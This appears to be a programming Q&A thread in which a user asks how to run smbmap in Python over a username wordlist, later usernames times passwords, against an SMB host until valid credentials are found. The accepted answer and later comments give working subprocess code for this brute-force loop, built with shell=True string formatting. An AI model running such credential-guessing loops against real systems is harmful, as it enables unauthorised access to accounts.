# Execute a command by reading contents of a text file

Tags: python, linux, list, module, execute

I want to automate a Linux command using python.
The command is:

```
smbmap -u robert -p p@ssw0rd -H 192.168.2.10
```

I have a wordlist which includes possible usernames in each line. How can I write a code which execute the command by reading the file? For example I have a list called "users.txt" which contains:

```
robert
admin
administrator
guest
```

And it should try as follow till it finds the correct user&password:

```
smbmap -u robert -p p@ssw0rd -H 192.168.2.10
smbmap -u admin -p p@ssw0rd -H 192.168.2.10
smbmap -u administrator -p p@ssw0rd -H 192.168.2.10
smbmap -u guest -p p@ssw0rd -H 192.168.2.10
```

Thanks.

Comment: What did you try and where did you get stuck?

Comment: you can execute that by using Python - Subprocess: https://docs.python.org/2/library/subprocess.html

Comment: @Jai  I use os module, the problem is that I don't know how to add the file to the command.

Answer (score 2, accepted):

This should work:

```
import subprocess

# read in users and strip the newlines
with open('/tmp/users.txt') as f:
    userlist = [line.rstrip() for line in f]

# get list of commands for each user
cmds = []
for user in userlist:
    cmds.append('smbmap -u {} -p p@ssw0rd -H 192.168.2.10'.format(user))

# results from the commands
results=[]

# execute the commands
for cmd in cmds:
    results.append(subprocess.call(cmd, shell=True))

# check for which worked
for i,result in enumerate(results):
    if result == 0:
        print(cmds[i])
```

Edit: made it your file path, changed to .format(), checked result == 0 (works for ssh trying passwords)

Edit: forgot to add shell=True

Comment: what version of python? (python -V)

Comment: $ python2 fuzzer.py 
  File "fuzzer.py", line 10
    cmds.append(f'smbmap -u {user} -p p@ssw0rd -H 192.168.2.10')
                                                              ^
SyntaxError: invalid syntax

Comment: On python3:

Traceback (most recent call last):
  File "fuzzer.py", line 17, in <module>
    results.append(subprocess.call(cmd))
  File "/usr/lib/python3.7/subprocess.py", line 323, in call
    with Popen(*popenargs, **kwargs) as p:
  File "/usr/lib/python3.7/subprocess.py", line 775, in __init__
    restore_signals, start_new_session)
  File "/usr/lib/python3.7/subprocess.py", line 1522, in _execute_child
    raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory:'smbmap -u administrator -p p@ssw0rd -H 10.10.10.172':

Comment: that's shell=True in subprocess.call(), my bad. Just fixed it.

Comment: Thanks. It works now.
But What if I want to check users and passwords? for example I have 2 users and 3 passwords:

smbmap -u user1 -p pass1 -H 192.168.2.10
|
smbmap -u user1 -p pass2 -H 192.168.2.10
|
smbmap -u user1 -p pass3 -H 192.168.2.10
|
smbmap -u user2 -p pass1 -H 192.168.2.10
 and so on...

Comment: I would read in the passwords and nest another for loop when building the commands. For user in userlist: for password in passwordlist: cmds.append(‘smbmap -u {} -p {}...format(user, password)